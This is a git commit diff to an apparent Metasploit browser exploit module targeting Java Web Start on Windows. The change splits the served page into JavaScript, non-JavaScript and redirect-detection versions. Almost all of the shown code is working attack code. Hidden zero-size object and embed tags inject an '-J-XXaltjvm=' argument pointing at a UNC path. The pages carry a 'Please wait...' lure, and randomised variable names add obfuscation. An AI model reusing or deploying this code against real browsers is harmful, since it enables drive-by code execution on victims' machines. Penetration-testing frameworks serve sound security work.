detect and split JS and non-JS versions

git-svn-id: file:///home/svn/framework3/trunk@9160 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/java_ws_arginject_altjvm.rb

@@ -185,9 +185,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			# HTML requests sent by IE and Firefox
 			#
 			my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-
-			print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
-
+			
+			# Always prepare the UNC path, even if we dont use it for this request...
 			if (datastore['UNCPATH'])
 				unc = datastore['UNCPATH'].dup
 			else
@@ -196,32 +195,28 @@ class Metasploit3 < Msf::Exploit::Remote
 			jnlp = "-J-XXaltjvm=" + unc + " -Xnosplash " + rand_text_alphanumeric(8+rand(8)) + ".jnlp"
 			docbase = rand_text_alphanumeric(8+rand(8))
 
-			# for the javascript version
-			var_obj = rand_text_alpha(8+rand(8))
-			var_str = rand_text_alpha(8+rand(8))
-			var_obj2 = rand_text_alpha(8+rand(8))
-			var_obj3 = rand_text_alpha(8+rand(8))
-			js_jnlp = "http: "
-			js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez
+			# Provide the corresponding HTML page...
+			if (request.uri =~ /\.shtml/i)
+				print_status("Sending JS version HTML to #{cli.peerhost}:#{cli.peerport}...")
+				# Javascript version...
+				var_str = rand_text_alpha(8+rand(8))
+				var_obj = rand_text_alpha(8+rand(8))
+				var_obj2 = rand_text_alpha(8+rand(8))
+				var_obj3 = rand_text_alpha(8+rand(8))
+				js_jnlp = "http: "
+				js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez
 
-			# The 8ad.. CLSID doesn't support the launch method ...
-			#clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'
-			clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
-			html = %Q|<html>
+				# The 8ad.. CLSID doesn't support the launch method ...
+				#clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'
+				clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
+				html = %Q|<html>
  <body>
-  <object id="#{var_obj}" classid="clsid:#{clsid}"
-   width="0" height="0">
-   <PARAM name="launchjnlp" value="#{jnlp}">
-	<PARAM name="docbase" value="#{docbase}">
-  </object>
-  <embed type="application/x-java-applet"
-   width="0" height="0"
-	launchjnlp="#{jnlp}"
-	docbase="#{docbase}"
-  />
+  Please wait...
   <script language="javascript">
    var #{var_str} = "#{js_jnlp}";
    if (window.navigator.appName == "Microsoft Internet Explorer") {
+		var #{var_obj} = document.createElement("OBJECT");
+		#{var_obj}.classid = "clsid:#{clsid}";
 		#{var_obj}.launch(#{var_str});
 	} else {
 		try {
@@ -240,6 +235,47 @@ class Metasploit3 < Msf::Exploit::Remote
  </body>
 </html>
 |
+			elsif (request.uri =~ /\.htm/i)
+				print_status("Sending non-JS version HTML to #{cli.peerhost}:#{cli.peerport}...")
+				clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ]
+				clsid = clsids[rand(clsids.length)]
+				html = %Q|<html>
+ <body>
+  Please wait...
+  <object id="#{var_obj}" classid="clsid:#{clsid}"
+   width="0" height="0">
+   <PARAM name="launchjnlp" value="#{jnlp}">
+	<PARAM name="docbase" value="#{docbase}">
+  </object>
+  <embed type="application/x-java-applet"
+   width="0" height="0"
+	launchjnlp="#{jnlp}"
+	docbase="#{docbase}"
+  />
+ </body>
+</html>
+|
+			else
+				print_status("Sending js detection HTML to #{cli.peerhost}:#{cli.peerport}...")
+
+				# NOTE: The JS version is preferred to the HTML version since it works on more JRE versions
+				js_uri = rand_text_alphanumeric(8+rand(8)) + ".shtml"
+				no_js_uri = rand_text_alphanumeric(8+rand(8)) + ".htm"
+
+				html = %Q|<html>
+ <head>
+  <meta http-equiv="refresh" content="2;#{no_js_uri}" />
+ </head>
+ <body>
+  Please wait...
+  <script language="javascript">
+   document.location = "#{js_uri}";
+  </script>
+ </body>
+</html>
+|
+				# end of detection html
+			end
 
 			send_response_html(cli, html,
 				{